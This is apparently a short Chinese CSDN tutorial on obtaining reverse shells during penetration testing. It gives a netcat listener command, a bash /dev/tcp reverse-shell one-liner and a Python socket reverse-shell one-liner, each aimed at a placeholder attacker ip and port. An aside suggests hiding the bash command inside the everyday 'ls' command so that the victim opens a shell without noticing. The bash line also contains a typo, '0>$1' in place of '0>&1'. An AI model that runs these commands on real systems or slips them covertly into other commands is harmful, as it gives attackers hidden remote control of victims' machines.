在渗透测试过程中我们需要把测试目标的shell反弹到我们的主机中,方便测试。比如在测试到命令注入时,可以反弹shell进行进一步测试。

一、nc和bash

在我们的主机上执行

nc -lvp port

表示显示执行过程监听端口

在目标主机上执行

bash -i >& /dev/tcp/ip/port 0>$1

(扩展:可以把此命令嵌入到常用的 ls 命令,神不知鬼不觉的让对方给你建立一个反弹shell,岂不妙哉!)
在这里插入图片描述
这样就可以在我们的主机上执行命令了
在这里插入图片描述

二、nc和python

在我们的主机上执行 nc -lvp port

表示显示执行过程监听端口

服务端执行以下命令

python -c “import
os,socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((‘ip’,port));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);p=subprocess.call([’/bin/bash’,’-i’]);”

注意修改ip和port为主机的ip和端口
在这里插入图片描述
测试效果如下
在这里插入图片描述

Logo

CSDN联合极客时间,共同打造面向开发者的精品内容学习社区,助力成长!

更多推荐